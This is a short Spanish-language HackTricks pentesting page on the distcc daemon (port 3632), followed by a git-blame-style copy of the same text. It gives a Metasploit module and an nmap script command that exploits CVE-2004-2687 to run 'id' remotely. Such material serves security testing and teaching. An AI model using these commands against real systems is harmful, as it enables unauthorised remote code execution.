hacktricks/network-services-pentesting/3632-pentesting-distcc.md

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}


# Información Básica

**Distcc** es una herramienta que mejora el **proceso de compilación** al utilizar la **potencia de procesamiento inactiva** de otras computadoras en la red. Cuando **distcc** está configurado en una máquina, esta máquina es capaz de distribuir sus **tareas de compilación** a otro sistema. Este sistema receptor debe estar ejecutando el **daemon distccd** y debe tener un **compilador compatible** instalado para procesar el código enviado.

**Puerto por defecto:** 3632
```
PORT     STATE SERVICE
3632/tcp open  distccd
```
# Explotación

Verifique si es vulnerable a **CVE-2004-2687** para ejecutar código arbitrario:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan

_No creo que shodan detecte este servicio._

# Resources

* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)

Post creado por **Álex B (@r1p)**


{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:02:46 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`<details>`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:02:46 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`<summary>Support HackTricks</summary>`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:02:46 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:02:46 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`{% endhint %}`
Translated ['network-services-pentesting/10000-network-data-management-p 2024-01-05 23:02:46 +00:00

f 2023-06-05 18:33:24 +00:00			`# Información Básica`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`Distcc es una herramienta que mejora el proceso de compilación al utilizar la potencia de procesamiento inactiva de otras computadoras en la red. Cuando distcc está configurado en una máquina, esta máquina es capaz de distribuir sus tareas de compilación a otro sistema. Este sistema receptor debe estar ejecutando el daemon distccd y debe tener un compilador compatible instalado para procesar el código enviado.`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`Puerto por defecto: 3632`
f 2023-06-05 18:33:24 +00:00			```
			`PORT STATE SERVICE`
			`3632/tcp open distccd`
			```
			`# Explotación`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`Verifique si es vulnerable a CVE-2004-2687 para ejecutar código arbitrario:`
f 2023-06-05 18:33:24 +00:00			```bash
			`msf5 > use exploit/unix/misc/distcc_exec`
Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:53 +00:00			`nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"`
f 2023-06-05 18:33:24 +00:00			```
			`# Shodan`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`_No creo que shodan detecte este servicio._`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`# Resources`
f 2023-06-05 18:33:24 +00:00
			`* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)`
			`* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)`

Translated ['network-services-pentesting/3632-pentesting-distcc.md'] to 2024-03-11 14:44:53 +00:00			`Post creado por Álex B (@r1p)`
f 2023-06-05 18:33:24 +00:00

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`<details>`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`<summary>Support HackTricks</summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
f 2023-06-05 18:33:24 +00:00
			`</details>`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-07-19 04:39:11 +00:00			`{% endhint %}`